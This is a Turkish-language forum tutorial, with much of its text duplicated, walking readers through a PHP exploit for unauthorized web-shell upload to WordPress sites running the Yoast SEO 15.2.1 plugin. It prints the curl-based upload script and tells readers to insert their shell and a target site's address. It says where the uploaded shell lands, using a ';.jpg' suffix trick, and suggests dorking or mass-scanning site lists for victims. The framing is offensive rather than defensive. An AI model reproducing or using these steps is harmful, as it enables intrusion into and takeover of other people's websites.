Selamın aleyküm değerli dostlar. Bu konumuzda sizlerle beraber Yoast SEO eklentisinin 15.2.1 sürümünü kullanan wordpress siteler için hazırlanan bir exploiti inceleyeceğiz. Bu exploit önceki anlattığım exploit gibi hedef siteye(eğer eklenti varsa) izinsiz dosya yüklemeye yarıyor.
Exploit linki: Cxsecurity
Exploiti incelediğimiz zaman Yoast SEO eklentisinin 15.2.1 sürümünde çalıştığını görüyoruz. Fakat bize herhangi bir dork vermemiş. İstersek yoast seo ile ilgili bir dork yazabiliriz. Veya siteleri bir listeye doldurup toplu halde taratabiliriz. Fakat bunun için kaynak kodda biraz düzenleme yapmamız lazım.
Yine exploitimizin kodlarını buraya aktaralım.
Bu exploit önceki anlattığıma göre biraz daha farklı. Sebebi ise bunun php exploiti olması. Kullanımı ile ilgili herhangi birşey söylememiş. Ama aslında oldukça basit. İlk olarak kaynak koddaki $Omid değişkenine shell konumumuzu yazıyoruz. Sonrasında ise $ch değişkenindeki kısmını silip hedef site adresini yazıyoruz. Sonrasında php dosyası olarak kaydedip çalıştırmamız lazım. Php dosyalarını çalıştırmak için xampp aracını kullanabilirsiniz. Eğer işlem başarılı olusa dosyamız yüklenecektir. Dosyamızın konumu ise cxsecurity üzerinde yayınlanan exploitte yazdığı gibi "http://localhost/wordpress/wp-content/plugins/admin/views/tool-file-editor.php/Shell.php;.jpg". Burada "Shell" yerine kendi attığınız shellin adını yazacaksınız. ;.jpg kısmı kalmalı.
Sonuç olarak bu exploit sayesinde Yoast SEO 15.2.1 eklentisine sahip olan wordpress sitelere shell atabilirsiniz.
Evet arkadaşlar bu konumuz da böyleydi. Bir sonraki konuda görüşmek üzere. Hoşça kalın...
Exploit linki: Cxsecurity
Exploiti incelediğimiz zaman Yoast SEO eklentisinin 15.2.1 sürümünde çalıştığını görüyoruz. Fakat bize herhangi bir dork vermemiş. İstersek yoast seo ile ilgili bir dork yazabiliriz. Veya siteleri bir listeye doldurup toplu halde taratabiliriz. Fakat bunun için kaynak kodda biraz düzenleme yapmamız lazım.
Yine exploitimizin kodlarını buraya aktaralım.
PHP:
<?php
$Omid="shell.php";
$ch = curl_init("http://localhost/wordpress/wp-content/admin/views/tool-file-editor.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('zip'=>"@$Omid"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>
Bu exploit önceki anlattığıma göre biraz daha farklı. Sebebi ise bunun php exploiti olması. Kullanımı ile ilgili herhangi birşey söylememiş. Ama aslında oldukça basit. İlk olarak kaynak koddaki $Omid değişkenine shell konumumuzu yazıyoruz. Sonrasında ise $ch değişkenindeki kısmını silip hedef site adresini yazıyoruz. Sonrasında php dosyası olarak kaydedip çalıştırmamız lazım. Php dosyalarını çalıştırmak için xampp aracını kullanabilirsiniz. Eğer işlem başarılı olusa dosyamız yüklenecektir. Dosyamızın konumu ise cxsecurity üzerinde yayınlanan exploitte yazdığı gibi "http://localhost/wordpress/wp-content/plugins/admin/views/tool-file-editor.php/Shell.php;.jpg". Burada "Shell" yerine kendi attığınız shellin adını yazacaksınız. ;.jpg kısmı kalmalı.
Sonuç olarak bu exploit sayesinde Yoast SEO 15.2.1 eklentisine sahip olan wordpress sitelere shell atabilirsiniz.
Evet arkadaşlar bu konumuz da böyleydi. Bir sonraki konuda görüşmek üzere. Hoşça kalın...